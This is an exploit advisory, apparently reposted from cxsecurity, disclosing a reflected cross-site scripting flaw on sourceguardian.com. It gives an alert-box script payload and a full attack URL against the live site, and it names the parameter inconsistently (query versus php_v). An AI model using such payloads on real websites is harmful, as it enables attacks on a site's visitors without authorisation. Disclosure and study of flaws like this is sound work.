Source Guardian Cross Site Scripting
2024-3-1 02:49:43 Author: cxsecurity.com(查看原文) 阅读量:29 收藏

########################## # Exploit Title: Source Guardian Cross Site Scripting # Date: 2024/02/29 # Discovered By: Mr_Amir_Typer # Tested on : Win11, Win10, Win8, Kali Linux ########################## # Vulnerability is the site search field query parameter have bug! Inject this code after query= "><script>alert("XSS%C2%A0vulnerability%C2%A0found%C2%A0by%C2%A0Mr_Amir_Typer")</script> ########################## # Address: https://www.sourceguardian.com/loaders/download.php?php_v=%22%3E%3Cscript%3Ealert(%22XSS%C2%A0vulnerability%C2%A0found%C2%A0by%C2%A0Mr_Amir_Typer%22)%3C/script%3E ############################# # Discovered By: Mr_Amir_Typer

References:

https://www.sourceguardian.com/loaders/download.php?php_v=%22%3E%3Cscript%3Ealert(%22XSS%C2%A0vulnerability%C2%A0found%C2%A0by%C2%A0Mr_Amir_Typer%22)%3C/script%3E




 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024020100
如有侵权请联系:admin#unsafe.sh